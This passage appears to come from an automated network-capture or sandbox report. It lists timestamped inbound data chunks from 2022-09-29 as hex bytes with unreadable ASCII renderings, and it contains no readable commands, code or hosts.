                                                                                                                                                            2022-09-29 12:45:22 UTC31109INData Raw: 0c 76 76 ed d9 41 11 b8 01 83 18 11 41 3f a6 0a 44 52 91 6b cb a4 f7 44 60 ab a0 50 2a c9 96 7c 7c 6d a5 8d c1 54 89 5f 9b 87 61 89 f0 5b 06 36 02 c9 ba 7d e1 e2 96 db 98 da db 51 46 49 ce 91 98 b2 eb b6 e9 53 fd 6d 89 99 cd 59 56 32 c5 c0 99 83 ae ae 87 ad f7 2a 17 3b 91 f9 c9 bf 17 92 6e 0e fb 6d 89 08 ae 03 9f 83 d4 97 fa 1c 45 7b 7e 51 0f e7 ca 00 e1 a3 4d 6f 42 f3 a3 7a c4 12 fb ac 9f ac e1 e3 61 38 c0 1e 6f ed 4b d3 40 d4 ab 16 a7 d7 0e fa 11 7f 55 36 0d 2a 06 ec 96 2a 39 e2 cb ba 5c 58 3d 8e 46 40 44 4d cf 13 41 19 0f 01 e4 4f d4 31 69 a0 56 58 8c 63 a3 a4 67 1f 3c 1e d3 1d 88 ec e4 c1 0a 9b 86 1d 1b a7 24 56 f7 bb 90 4c 77 fc 43 cd 9b c3 dc a2 fb 8b ca 66 63 05 9c e5 89 7e 18 db ac 03 a2 9a 3e 90 77 72 9b ce 7c ea 0e fe d6 46 4d 8e 55 30 9d f2 cb
                                                                                                                                                            Data Ascii: vvAA?DRkD`P*||mT_a[6}QFISmYV2*;nmE{~QMoBza8oK@U6**9\X=F@DMAO1iVXcg<$VLwCfc~>wr|FMU0
                                                                                                                                                            2022-09-29 12:45:22 UTC31125INData Raw: be 53 51 5b 20 71 02 d2 ac 50 60 b2 e1 c3 46 fa 33 dd 73 17 d7 f6 64 5b 26 8c f4 9a 92 2d d9 30 1c 73 ee 43 9f 5f 05 b2 11 c0 9c d7 e7 67 17 24 43 1e 9c d2 a4 c7 08 18 f0 ab 67 7d 78 c4 bb b9 7d 59 56 51 a9 56 3a 90 76 53 f7 16 46 90 b1 17 56 6f ac 27 a0 ff ed 4a 15 3e 14 22 29 67 de 41 84 dc 63 d7 a4 6a 51 0b af f2 34 93 fc 9f 12 ee 1b b1 55 ac 10 99 d4 17 c3 30 8e 26 90 86 9e f7 c5 d8 0f 75 aa c6 3a 83 c5 a0 53 f7 4d 24 92 c1 60 d2 8c cf 84 20 67 31 29 58 a4 e3 8c 02 51 61 45 c2 8e ac 54 7a 65 d1 51 69 5e dc 79 aa aa 13 eb 2b ae bf 3b 7e e1 6a 19 33 7b 53 da 0e 85 5f f5 2e 70 4a fc 06 f5 13 09 7f c3 c2 77 0d ea 72 c5 54 45 ec bb eb a4 c6 8d 8e 6c 91 7e 53 b6 8f 9d 11 4b e6 c9 99 4c 60 12 57 42 c8 66 50 dc 65 aa 4b ff ec 5b 93 fd 6f 86 6e 46 b9 3a 21 70
                                                                                                                                                            Data Ascii: SQ[ qP`F3sd[&-0sC_g$Cg}x}YVQV:vSFVo'J>")gAcjQ4U0&u:SM$` g1)XQaETzeQi^y+;~j3{S_.pJwrTEl~SKL`WBfPeK[onF:!p
                                                                                                                                                            2022-09-29 12:45:22 UTC31141INData Raw: 44 13 a0 a1 9f 61 c6 9b 8b 20 b5 84 8e d9 7e 73 c0 43 2e 6d fa dd 9a bb 47 81 69 50 fb 87 1f 0e 0e 3c 69 df 75 5b 17 3e 45 11 9d a4 96 27 45 59 eb f2 5c 72 de c5 10 9c 6e e3 b9 ca fb c0 fa e8 fa 46 0b 79 0b 1e 88 4d b1 45 2a 56 96 ba c2 98 69 7f f0 b8 25 27 5e d6 a7 b7 16 9b be ff b8 e3 4a 33 a9 24 40 23 02 f4 18 16 52 31 21 af f4 d8 19 d7 74 61 38 22 6a 9f 24 37 e2 d0 18 b7 90 50 b0 ee c0 77 9b 10 3d a9 bc 1b 4b 3d 1a 86 1b 3c e6 f1 1a 2f 75 6f 14 30 32 a5 d6 0e eb 11 28 68 1c f4 ba bf 94 b3 f7 cd 22 f5 f0 04 61 9d 57 6d 91 51 a3 c6 0b de d4 db 08 ad 30 ba a5 b9 d5 5c 91 46 c5 c0 be 18 54 46 ea 8e 53 77 8d 73 96 92 48 fd d1 48 fa 74 35 1c b1 60 fc 9d a4 1b f5 99 f4 06 7c 90 ff 52 58 ea dd 60 e8 f5 23 67 20 71 6c f5 b7 f9 44 5f 95 2a b0 74 d9 96 bf 5d 1c
                                                                                                                                                            Data Ascii: Da ~sC.mGiP<iu[>E'EY\rnFyME*Vi%'^J3$@#R1!ta8"j$7Pw=K=</uo02(h"aWmQ0\FTFSwsHHt5`|RX`#g qlD_*t]
                                                                                                                                                            2022-09-29 12:45:22 UTC31157INData Raw: 9d 73 5c 1e df 5e 6c be b6 e5 10 fd c9 f1 fe ff 8f 89 bb a0 b6 4e c5 c8 cd d9 c1 70 8a 52 40 ca 7d 8c b1 f6 66 d8 1d 47 f9 e7 a1 22 5f 01 09 ca 85 6d c9 9e 8f 66 38 f3 c1 6f 0b 7f 9d d0 10 d3 67 35 d9 ef a7 92 25 b6 5e 84 e6 0c 5a 1e 2f 6a 64 c1 55 7b d7 89 05 76 26 b1 18 14 ab 8e ba 9d f2 f7 01 6b 2d 39 8a 9f c8 e4 56 93 ab e9 e0 7a e9 b1 2d f7 4a 98 68 36 a3 6a 0c a6 a5 28 c1 4a 62 3a 22 bb 2b 4f c2 72 25 02 09 79 73 fe e6 8a 82 bf f2 ab d4 7e 59 d8 af e6 74 20 ed ac b8 0b 8b 66 fc 3d a0 bf ae 19 ed a5 19 d3 d0 e8 5f 9c b2 0f 4d ae df 73 2d c9 92 52 e6 1a 87 5e e5 16 0c c1 63 50 16 33 b2 7f b4 5f b8 0b 8c 1e 6f 4f fe 5a a2 74 16 f9 cb 5f 89 d4 a2 3c fa 0a 72 d7 c7 75 7d 8c cc 1a 76 3a 7c 3f 5d 93 e8 8b c9 87 32 25 78 92 72 36 33 21 9c 8e 4b 4c 8f aa ff
                                                                                                                                                            Data Ascii: s\^lNpR@}fG"_mf8og5%^Z/jdU{v&k-9Vz-Jh6j(Jb:"+Or%ys~Yt f=_Ms-R^cP3_oOZt_<ru}v:|?]2%xr63!KL
                                                                                                                                                            2022-09-29 12:45:22 UTC31173INData Raw: 70 bb 8a 59 f9 da 2a 1a 60 3f 2f 29 68 9d de c3 63 c6 45 e9 c4 b6 27 aa 5a 38 59 bc 0d 18 ac 75 75 38 c3 fb 2b 80 08 3f 13 95 8e 96 1f f0 88 6d 7a 15 9f 35 45 55 3b 04 99 a2 54 4f 5f fa 12 30 7f fe 63 32 75 c6 5a b9 7c d3 a2 17 3b 74 22 73 ad 8d 01 c3 15 82 6b fc 8b 4b 33 0e f3 c4 dd c9 45 90 5a ac 01 3b b4 97 b8 db d2 71 58 dc 4b 91 9f e8 e7 b6 1d c5 86 a4 f4 4b 23 01 dd 52 3b d2 13 7a 49 ae e5 1c 78 b5 0c 41 5d b0 50 bd fc 08 96 9d b0 4d 2b 1c 19 99 37 10 6d 24 d8 ac 66 18 8d fc 50 e3 96 8f 7c d6 e1 cd a6 20 49 6e 37 17 73 b5 09 e6 0b ca 35 68 03 39 6b a6 8c fa 7c 74 c3 e8 99 82 d1 7e 49 7b f5 a7 e8 75 c2 42 e4 21 0a 1c f6 bc 36 dd b1 99 0b 52 6e ed a6 22 c7 01 53 97 8d 7b f9 5a 17 8a e4 54 01 e1 a6 cb d1 56 37 c2 81 c4 5c dd 36 dd 83 03 ea ba a3 c2 a3
                                                                                                                                                            Data Ascii: pY*`?/)hcE'Z8Yuu8+?mz5EU;TO_0c2uZ|;t"skK3EZ;qXKK#R;zIxA]PM+7m$fP| In7s5h9k|t~I{uB!6Rn"S{ZTV7\6
                                                                                                                                                            2022-09-29 12:45:22 UTC31189INData Raw: d9 b3 dc a2 77 40 b3 ff 0e 49 c9 7f 94 fd 79 58 13 b6 c3 61 12 6b 4b 73 48 f8 ef c5 e9 50 e6 5f 82 7c d2 15 1d e2 96 6d 52 0c 97 c5 41 88 62 93 3b 5c 19 9f ce bd c8 cb 6b 60 b8 a9 87 48 47 d7 98 f4 dd f3 d6 90 eb 0c 19 af 27 6d 91 eb 78 2e 58 0b 3f 57 98 fb 3e a3 5b 2d 35 2d 27 04 24 98 cf 47 97 c1 9d 0a 29 39 8e ce b1 4a 64 84 e2 a8 0b 5c 9b e7 85 17 13 02 3c 6d 9a f6 84 71 db 3b f6 55 d3 e7 da 3f 67 dc 18 23 b5 b4 79 b9 a1 11 60 c3 20 0e 79 34 0d f8 5d ad e9 4a 0f 23 94 98 4b 4f 0a 2d 6f cc f8 9e 3b ad f2 d7 5f 77 c0 ac 96 e4 4c ee 7c ce fe 7d 1c b0 b4 f6 5a 68 5a 94 17 fe cd 6d ed bc 13 0c 97 bf 96 20 1e c0 d1 88 54 81 bc 01 33 d0 82 91 90 fe c3 47 f7 3c db e7 26 98 96 56 1b e8 42 bc 74 60 ae eb 58 89 0a 76 8f c8 41 04 e2 0d 58 d7 ff 90 ee 25 93 47 ee
                                                                                                                                                            Data Ascii: w@IyXakKsHP_|mRAb;\k`HG'mx.X?W>[-5-'$G)9Jd\<mq;U?g#y` y4]J#KO-o;_wL|}ZhZm T3G<&VBt`XvAX%G
                                                                                                                                                            2022-09-29 12:45:22 UTC31205INData Raw: e7 e2 d4 b6 80 65 9d a4 9d 46 e4 39 04 6d 40 53 a2 2e c6 1b b7 4e 8e 5e 84 aa e2 aa f5 ca 60 8f 92 cf fe df e6 49 d2 3f fa d3 b4 7c 81 41 c6 2e fb c9 c4 1b c0 c5 bd 7e 0c 5d f5 f0 0e 9d 20 65 7a 2d ed 53 00 f0 60 d6 a7 85 f5 fd 3f f7 40 b1 a8 4d 49 d9 ed 28 11 11 2b a4 2e c2 b1 26 e9 aa 3e e4 27 f5 0b 34 c2 10 db da 77 5f 17 c5 ad 5d 18 71 31 5b ac 32 5c 02 d0 68 6e b5 9d d9 22 aa ba 21 25 0b 1d 1d 74 81 f3 ee 8d c0 21 bf a1 52 87 b6 f9 45 c3 57 7e c4 dd df 5d 8c f0 a3 f9 60 c7 a2 1a a2 94 08 7f cc 3b cd a8 f3 85 04 ea 39 52 70 98 de 0f a3 e5 8a 7c d6 bf 34 ae e2 42 a0 82 d1 48 61 82 0c d3 80 7f 85 4a a9 20 59 0e a4 39 92 a9 eb 79 76 57 79 b2 92 4c 66 49 be 6c ae 36 8f da f9 b1 46 5f 82 53 ba 59 8c 92 f7 e0 7f 7c 85 ad da dc 49 33 fc 12 14 77 91 85 10 a2
                                                                                                                                                            Data Ascii: eF9m@S.N^`I?|A.~] ez-S`?@MI(+.&>'4w_]q1[2\hn"!%t!REW~]`;9Rp|4BHaJ Y9yvWyLfIl6F_SY|I3w
                                                                                                                                                            2022-09-29 12:45:22 UTC31221INData Raw: 2c be 26 b0 c2 e3 57 28 ec 1a 87 a9 ad 08 e9 e4 d2 c3 5b 2f df 8d d4 52 d6 e1 a0 17 e4 b4 4e d1 11 85 66 9d b1 2f fe 01 52 8c 1b 6f 77 2a 15 fe 59 22 6c 0c e0 99 5c 4d 80 04 62 7a 95 99 a9 37 4b b8 9a 01 9f 41 57 a9 14 fa 90 72 ca 72 15 6d 2a 8b 28 6c d3 2e d4 5c 52 db 8d 53 c7 65 90 06 ea be 6c a6 0e 1e 21 8c c9 3e 8a 5a 4f 9c be cf f6 89 5a 7f dd 62 7f 28 ce 90 ea c2 91 ac db 36 a4 db 72 c9 80 63 c8 60 51 8c 0f ec 07 2b 9c d0 01 01 3d aa ce f7 96 77 3b 8a a6 e3 0e 28 91 23 79 07 2e 47 20 7e 18 a7 d1 f2 6e ba f8 eb 31 d0 98 f3 d4 de 6a 26 99 bd 84 f2 5e 75 d2 38 14 8c cb 19 7c 61 b0 ea 65 8d 7c 4b 89 d3 43 72 f5 cf 7f 6e 9b 38 ed 91 70 25 ec 09 90 01 47 71 73 2c 68 19 4d cc 56 3b fa 69 38 e4 9d 43 67 0c 35 da 15 5c ec 20 45 35 7d 1d 32 03 55 d0 18 2f 89
                                                                                                                                                            Data Ascii: ,&W([/RNf/Row*Y"l\Mbz7KAWrrm*(l.\RSel!>ZOZb(6rc`Q+=w;(#y.G ~n1j&^u8|ae|KCrn8p%Gqs,hMV;i8Cg5\ E5}2U/
                                                                                                                                                            2022-09-29 12:45:22 UTC31237INData Raw: c8 85 cc 6b 80 55 f3 e5 40 f4 52 b9 d2 69 ab 3a d6 dd 4b 50 d1 83 7b b1 2c b3 10 5c 08 b1 1f 60 7a 25 2c 40 1b b5 e0 3e 89 d1 fa 7a f0 1b 07 f3 6f f5 97 e5 78 48 b9 05 4b 6f fd 73 41 87 0c 02 2f 1c e5 96 1f 42 3d cc 9f 1d 6e b4 e9 63 f8 6f 50 1c 86 05 4e 3e be d8 64 5c e5 67 dd 8a dc 64 05 4e dc 3b 29 3e 85 92 aa 19 06 8e ed df 8e c6 90 b3 5a d2 cc d7 10 90 c3 c5 d3 9f 65 54 3b ba 55 f5 bd 56 76 93 b1 87 49 28 6a 88 99 72 c0 fd d9 bf a8 c3 8d 80 10 d9 e6 0d 1b 9b 62 32 9e 14 3b 61 ac e5 a6 c5 25 9d d9 af 19 ba 82 a7 65 8f c0 53 22 d5 2a b2 44 7f ca 04 4f ee f6 75 53 d9 fc a8 38 24 2e d3 66 25 9b 18 f9 b8 b6 d5 aa 65 ad 97 e5 70 8d e7 48 f6 4e 4e 86 50 79 ac 0b 10 b7 dd c5 31 3a 89 51 94 05 46 fa c3 26 29 50 a5 af 5e 4f 60 05 05 61 cd aa 3e fa 4b 53 b4 68
                                                                                                                                                            Data Ascii: kU@Ri:KP{,\`z%,@>zoxHKosA/B=ncoPN>d\gdN;)>ZeT;UVvI(jrb2;a%eS"*DOuS8$.f%epHNNPy1:QF&)P^O`a>KSh
                                                                                                                                                            2022-09-29 12:45:22 UTC31253INData Raw: b4 b3 d7 c9 fe d6 1b df 86 a6 ad ba 88 67 df a9 2d e7 62 50 6a 93 30 21 cc 9e cd 9d 52 e3 b6 40 6c 57 98 ab 58 3e 45 44 59 86 83 65 a3 ab 38 48 90 02 62 f6 72 22 48 38 af 28 fc 75 f6 f8 1d 34 a1 b3 07 b5 45 fd 7e e7 79 09 00 72 87 91 89 d8 8a 7d ce f3 6e 39 fc 52 25 e7 16 38 94 cf 11 e3 aa 0a 7f 88 87 09 70 3b f0 74 f6 12 be 23 c2 7d 83 61 6f 79 a2 0b 83 f0 c4 32 16 3b ab 2d f6 43 64 94 20 76 17 cf ff 9a 9a 9e ce f5 96 df 15 02 6f df f9 1c 46 7d cd 40 d9 f8 92 03 29 b9 b1 3f b0 49 3c 6b 09 3c 5d f0 68 94 58 11 bd aa cb 7c 46 83 36 14 a4 31 4c 89 4d b4 a3 d2 07 79 e5 ef ad a0 f0 83 2a 4f fb d6 3a 0c 65 52 db eb 81 aa 30 cc 2c b2 0d 85 1f 0b 7f 3d ec df 90 be 7c 31 91 47 17 eb c9 84 1f 53 53 fd ba e5 48 73 c9 87 f0 17 ed 5d 57 49 ec f0 39 88 d2 8d 7d e0 21
                                                                                                                                                            Data Ascii: g-bPj0!R@lWX>EDYe8Hbr"H8(u4E~yr}n9R%8p;t#}aoy2;-Cd voF}@)?I<k<]hX|F61LMy*O:eR0,=|1GSSHs]WI9}!
                                                                                                                                                            2022-09-29 12:45:22 UTC31269INData Raw: 42 30 93 c2 85 c8 7d c4 e5 d0 08 fb 2e d7 29 36 58 be ac 89 0d 1b e2 a8 f9 7d 7b f9 fa 5b bd c9 45 03 0e 6f 27 67 f9 94 1a 6f 69 d6 18 3d f4 49 fa 7b a7 7b 2a 74 04 54 4f 18 47 0e 39 06 8b 4d 9e 37 9c f4 da d6 3e a9 53 9e bd 7a 0c 94 a8 db 21 3b e5 cc e7 57 59 70 75 b3 0d d9 11 f4 f9 1f 10 c6 b5 49 b7 87 29 b4 bb 4a 3a 3c b2 1c 19 15 a1 1d ff 8e e2 f1 7a 45 3d c3 bb 33 09 72 49 6a 74 52 bc b6 2f b6 9e 07 59 d8 d0 8f a8 27 22 d6 85 93 d5 e4 c1 0d 12 94 9d 0f bd 97 97 ae c8 e8 06 46 92 c9 24 57 6a 16 ac ae ce d1 c4 07 9b d6 5d 93 00 3a ad a7 a1 9a 4e 92 b3 63 d1 62 08 83 7e 9b 3e 66 d6 02 45 20 66 45 59 24 63 73 ef 33 8b ba 95 7a 10 96 4e d0 a2 81 fa 5b 33 fd 34 ce c9 b6 d1 97 4e 21 5d 44 82 67 ca d0 90 65 c5 55 9a 92 b3 28 29 ef 7c 82 12 dd 61 da 35 57 81
                                                                                                                                                            Data Ascii: B0}.)6X}{[Eo'goi=I{{*tTOG9M7>Sz!;WYpuI)J:<zE=3rIjtR/Y'"F$Wj]:Ncb~>fE fEY$cs3zN[34N!]DgeU()|a5W
                                                                                                                                                            2022-09-29 12:45:22 UTC31285INData Raw: 41 25 54 24 49 ba 3c 44 1e 56 3e be de c8 54 55 2a 7d d8 ec 80 7e 05 dd 49 53 f2 8b b0 6e ac ef 0c a8 e7 d9 76 ec 60 2c c8 2b 32 df 2e ff b6 cf f1 67 7a 0a 9d 5c c9 9e 61 a5 a3 53 88 92 81 06 ac f1 2e 53 d2 f0 01 4e ac 4c 78 ec 1c 51 19 2b f2 91 c7 6f 8c 39 e7 be e6 4e 11 8c e3 ed 83 c4 58 a8 7b 5c 30 7d c3 ae 05 fd 65 91 62 96 97 2e 42 3f 2b 94 a6 53 5c 23 93 cd 32 84 96 a3 dc 63 29 f5 2e d9 a5 d9 4a c3 fb f1 21 ef c5 84 93 cd f9 4c 83 70 c2 69 56 73 c3 be a4 28 a3 29 81 f9 5e 1a 94 6e 99 a7 49 0a d2 b6 2a f4 c8 05 9c ce 6a ab 8d 16 f3 df 6d 5b 6a ad 80 3b 64 1c 9e 4c 85 fa f6 36 c9 37 a1 f2 a4 6e 22 43 53 7d 77 cc 82 8d ca 44 df 2a 1e 99 62 be bf 78 bd c9 e4 9b 0f 54 63 fb be ac e9 b4 e6 42 c5 0c a5 5d 73 e6 5f c9 be 84 4e 26 4c de 03 10 53 38 5a cb ea
                                                                                                                                                            Data Ascii: A%T$I<DV>TU*}~ISnv`,+2.gz\aS.SNLxQ+o9NX{\0}eb.B?+S\#2c).J!LpiVs()^nI*jm[j;dL67n"CS}wD*bxTcB]s_N&LS8Z
                                                                                                                                                            2022-09-29 12:45:22 UTC31301INData Raw: 89 96 3d 6c 1c 5c db 2b d9 6a 0e 37 cb d6 08 76 6b 54 26 b1 fe ab 4a 99 ba 14 42 66 a8 9e c9 5f 47 8b f7 40 73 cd f3 89 28 18 4a cb 25 aa 7f 04 ac b3 e8 1f a0 9f 20 d4 38 0e 41 49 0f 3d c8 eb 81 5e 7c cf 26 26 fe 08 b2 11 42 dc 5c 87 67 99 18 d6 fb 5a fb 72 fb 7a 5b 09 04 dd 18 a7 41 9b 21 4e 2e 90 a0 90 6f 44 ee f9 68 c8 1f 8c 16 20 c4 1f 0a ca c4 4e b1 32 6f 2b 72 d4 96 0c ec 7f 28 54 16 c1 af 15 27 3f c8 b6 ea 97 bd d5 73 81 47 a6 27 18 79 51 d9 db 40 d8 11 9e cc 30 1f b4 55 d2 8c b2 3e 45 15 ae e6 0d f0 25 4d 14 cf 45 ba 24 35 47 08 9b c1 34 b5 c5 71 45 6a e4 91 1e 21 d4 52 fc 69 d0 b5 c3 f2 17 f9 2b 8f 00 a2 bc 5a 29 50 39 eb 7d 7a eb 5c b4 50 8a 27 00 57 33 3b 9f 6f 63 72 88 e6 20 0b b8 69 f8 77 a9 b1 59 96 6f e7 72 d8 d7 2f fb 63 38 da 96 61 08 29
                                                                                                                                                            Data Ascii: =l\+j7vkT&JBf_G@s(J% 8AI=^|&&B\gZrz[A!N.oDh N2o+r(T'?sG'yQ@0U>E%ME$5G4qEj!Ri+Z)P9}z\P'W3;ocr iwYor/c8a)
                                                                                                                                                            2022-09-29 12:45:22 UTC31317INData Raw: 7b 38 bf 04 3d c4 ef 96 6b 60 03 8b 51 f2 68 00 0a e3 94 56 b6 40 ca 93 1d 51 fd d1 8c 97 14 a1 bb 57 1c 80 5e 04 4b 10 24 0b a3 83 35 2a 0c 01 e2 a0 eb cc 49 4c 84 be a7 f7 50 b5 71 8b ce 89 6c 90 57 ac c3 d2 5b 80 a1 a2 08 5d 23 c0 77 7b 96 15 0b 42 94 1e bc 85 92 35 00 4d e5 28 5f 51 dc 75 8e 3c 3e 2d b1 d8 91 bb 74 08 ee 7c 8f 26 07 9e 2a 2d 8a bb 28 60 39 c4 48 c7 4e 4c aa b2 60 cc cf 35 86 51 60 68 bc 3f 49 d2 54 c4 5c 16 1f 5b 34 b5 c1 a0 cf 66 85 92 cc 27 1d 76 00 f5 06 5c 00 86 7d b2 40 ae 91 81 e0 d7 a4 eb 8a bf 87 df 60 ee 84 6b 94 cc c0 77 1f ae 08 67 be 48 e9 7f 2b 7d 41 85 ee b1 5e 6e 93 b9 7b 1b 95 09 1f b0 a7 52 80 b7 85 fd 9c e5 55 25 ff 14 55 d3 af 59 bb c3 2c 07 b0 e3 06 09 ba 5d bb 3b d6 80 c6 50 59 ea 8a bb ee 4e 0a db df ca bb f5 38
                                                                                                                                                            Data Ascii: {8=k`QhV@QW^K$5*ILPqlW[]#w{B5M(_Qu<>-t|&*-(`9HNL`5Q`h?IT\[4f'v\}@`kwgH+}A^n{RU%UY,];PYN8
                                                                                                                                                            2022-09-29 12:45:22 UTC31333INData Raw: 42 e9 bc d5 aa a5 3e 8b 49 e4 8c bd 0c a8 29 6d f8 d9 3b e5 af b8 95 c5 a1 0e 3a 18 31 53 31 a7 b6 e4 15 09 18 55 36 c4 de 0b 1b 70 f6 7a c9 82 54 36 d0 2a 7f e5 13 8b 24 4a 89 fb 59 0d c8 e6 80 c7 4a 03 cf 2e ad 00 cb 64 71 c6 17 48 6f 6c 68 1e 64 d6 f1 cd 88 25 c9 06 1b 20 f0 b3 e5 66 4f 40 fa d6 4d 2f b3 6d f1 4e dd fc 88 75 df ef 8a 94 63 5b 04 3f be fa 4c d2 d9 59 c0 38 0c 6c 7b 00 d6 1d 0f 2f de 0d 72 c3 33 e9 01 95 6d a4 95 0d bf 4a 1a 69 1e e5 1d 59 d7 f6 cb 1e 84 21 d4 6e 37 b4 77 8d 12 ad 73 03 d0 48 60 e7 4a 9c 6a f8 81 9c 22 53 09 61 11 ba 4b 3c 12 b1 c5 0c eb 7b 5f 34 01 d6 cd 9a 06 a2 8f 22 41 58 af d2 c1 6e 4c 1a 84 f3 1f ad aa 7f 52 3a 1b 5e ba 84 69 14 24 79 f0 e2 29 6d 56 35 17 68 2d 0d bd da 4f 03 3d cd 96 09 10 3f 60 26 2b b5 71 4c 5a
                                                                                                                                                            Data Ascii: B>I)m;:1S1U6pzT6*$JYJ.dqHolhd% fO@M/mNuc[?LY8l{/r3mJiY!n7wsH`Jj"SaK<{_4"AXnLR:^i$y)mV5h-O=?`&+qLZ
                                                                                                                                                            2022-09-29 12:45:22 UTC31349INData Raw: bf 32 d4 62 c8 60 5b 81 95 e4 48 f7 24 5d 35 b5 69 96 55 3c 04 53 05 50 14 29 d9 1b a9 a7 5d 5a 97 2c d8 0b b4 17 94 76 7d 37 fe 10 7f 93 a5 5c 69 47 9f 04 11 a9 6c f7 84 be d1 50 5b f3 47 de f3 3a 5d 9e 9a e9 1c 18 ba eb 5e c0 f7 9e 2a 52 7f 8a 51 ce 25 e9 89 cb 10 9f a7 ec c9 04 51 5f fa 67 73 39 18 28 77 ed 46 12 9d c1 af 05 e8 7e 36 f5 17 cc 80 32 7f 36 ab 44 7a a8 da ba dc c1 f3 b9 07 27 c1 66 40 6a 7f 5b 70 2a 36 b5 3f 58 6b 67 d1 ab 6b 71 3d bd cd d7 28 42 e0 9c 08 3e f9 e4 e9 8d 1b 86 79 39 7c 6d d3 4a 6c 0a 30 fb ca 4e 45 cf 41 67 63 32 34 5f b8 ea 0e 57 ed f8 59 26 df 49 d7 30 1a 2e 4c bb 65 cd 00 bb 0a 4e 39 83 78 40 32 17 83 a3 ce 22 e5 8f 63 33 60 2e f3 88 aa 78 2a 30 6c 7a 2c 56 ee 5d ef 44 00 54 28 ae 58 94 66 15 f0 5e 37 26 c3 3c 3b 33 24
                                                                                                                                                            Data Ascii: 2b`[H$]5iU<SP)]Z,v}7\iGlP[G:]^*RQ%Q_gs9(wF~626Dz'f@j[p*6?Xkgkq=(B>y9|mJl0NEAgc24_WY&I0.LeN9x@2"c3`.x*0lz,V]DT(Xf^7&<;3$
                                                                                                                                                            2022-09-29 12:45:22 UTC31365INData Raw: 05 f6 d2 6c b8 bf 70 20 30 2e c7 65 cc ad 02 aa d0 06 87 9b 06 3a ef bd 45 8e c9 25 8b 5f 2a 36 a9 6c 10 65 4c 00 93 b1 a1 23 80 b6 31 b0 79 e8 8f 7c fc af d3 34 e2 d9 99 77 5f b0 5d 93 aa df 0e 5c 60 ec 60 8e 41 0d 02 a8 04 23 ac 7a 6a d5 27 d1 7f d7 de 8e 6c 34 2c 1c de 1c 3d 73 40 f6 2f 5b a1 28 ef 84 5d 5d c9 fe 8d 0e cd 16 97 18 12 95 cf 4b 3d 4e 77 6f 1b 74 34 38 3c 0b ed 41 7e e0 35 64 37 8c 95 f3 60 15 57 55 67 27 32 14 4e 3a 9e d6 23 ed 65 2a 69 97 03 47 99 48 c7 dd 4e 08 28 22 ee 2b 2c e8 aa 80 b1 ad 0f 59 61 38 38 14 8b ad 43 2e d7 cc 28 e5 92 fe 0b e1 9b 08 3f 05 4a 36 fd 02 4a d5 64 06 dd b0 fd d4 91 38 fd 30 19 54 ff 6c e3 97 dc 7d dc 9d e3 cd 92 9d ae 28 e9 44 29 2b 8e d3 c1 1d 27 31 3d 51 31 71 9d 55 0b cc 5d e6 53 6f bb de 25 b4 d6 2e 7c
                                                                                                                                                            Data Ascii: lp 0.e:E%_*6leL#1y|4w_]\``A#zj'l4,=s@/[(]]K=Nwot48<A~5d7`WUg'2N:#e*iGHN("+,Ya88C.(?J6Jd80Tl}(D)+'1=Q1qU]So%.|
                                                                                                                                                            2022-09-29 12:45:22 UTC31381INData Raw: 41 2a 3c dc 7a 15 3e f3 41 53 b1 46 18 4b 88 d3 8d a7 11 03 de ff 88 04 bd 38 7b 8a e8 d2 d9 fd 0e fe 3f a9 9a b7 bd dd f2 fb 41 51 f5 4e 53 8a 27 a9 30 a0 2b d8 d8 b4 c6 0e b3 1a a5 a9 85 1f e3 2c 00 e8 f3 69 b8 7f 77 ec fe 12 dd db 3d ed ba db bb 0a 81 18 28 21 56 da c7 48 c2 a9 b9 3c 84 80 69 a0 87 9b a2 c7 c0 0f ee e2 d6 0f 0e 03 86 f7 02 37 be 4f 4f f5 bb 16 a0 62 23 6b ff a1 d7 38 7c 4a e2 f4 5f 18 17 36 e6 c9 cc fa 37 32 71 91 6d 50 a9 40 99 87 53 79 d2 45 06 26 01 32 06 9d 44 4d c6 67 37 b6 21 41 fc 35 8c bb 35 b2 c2 49 46 92 3e e1 72 54 d8 e3 86 c0 e4 a2 58 69 b5 89 8d 56 89 1e 59 b3 3e 0c 1d f2 4b fa 7c e8 28 3c 8c bc ed d8 ee d3 72 76 d9 b7 b0 a0 04 08 c3 b7 ec 73 8e ac af 92 f7 a3 4c 5b 05 94 34 3f c2 1a 99 82 63 47 16 29 bc 07 d2 55 66 6e 8b
                                                                                                                                                            Data Ascii: A*<z>ASFK8{?AQNS'0+,iw=(!VH<i7OOb#k8|J_672qmP@SyE&2DMg7!A55IF>rTXiVY>K|(<rvsL[4?cG)Ufn
                                                                                                                                                            2022-09-29 12:45:22 UTC31397INData Raw: 9f d6 e8 58 7d 8d 66 52 2b af 93 9a d9 9d 77 4c 46 04 ba e7 97 34 2d 84 5a 31 5f cb 5e 47 f9 26 17 04 30 51 5a 20 7b d9 df a0 6a 07 85 cb dc 78 b9 1b b8 95 3a 4f fc c2 e1 26 0a bc 7c d8 84 85 5a c5 9c 78 bc 23 89 e3 0d 3c 01 2f 7c d1 d8 ab 95 dd 77 e8 ce d8 21 07 84 25 44 b4 34 58 fb 6e c7 fc e5 60 45 a9 fc 0f 5e 07 77 68 63 00 00 f9 56 3a a0 83 8a c9 cd 18 6f 56 68 5b 41 e5 35 c4 05 d6 9b 20 4e e3 77 f7 a2 28 87 22 1d 84 0a fd 26 07 7b e6 14 12 d0 96 eb 48 1f 23 55 a9 bd bd 38 89 b1 ec a1 d5 2d 2c ea a6 53 86 db 57 bf 89 f6 ed da 57 31 0b ed 12 9c 27 20 cd bd 19 4a 8f 7c 29 0e 50 02 0d 13 1a e8 21 a6 f2 7e 1a fd 19 0f 75 2c eb 80 62 a0 52 1c cf c3 2c 8e 00 bb f4 37 ee 92 fb 60 fd 66 92 4f 4a 19 54 84 41 75 29 04 90 f9 58 72 0c a6 71 33 3b 97 e3 42 50 1f
                                                                                                                                                            Data Ascii: X}fR+wLF4-Z1_^G&0QZ {jx:O&|Zx#</|w!%D4Xn`E^whcV:oVh[A5 Nw("&{H#U8-,SWW1' J|)P!~u,bR,7`fOJTAu)Xrq3;BP
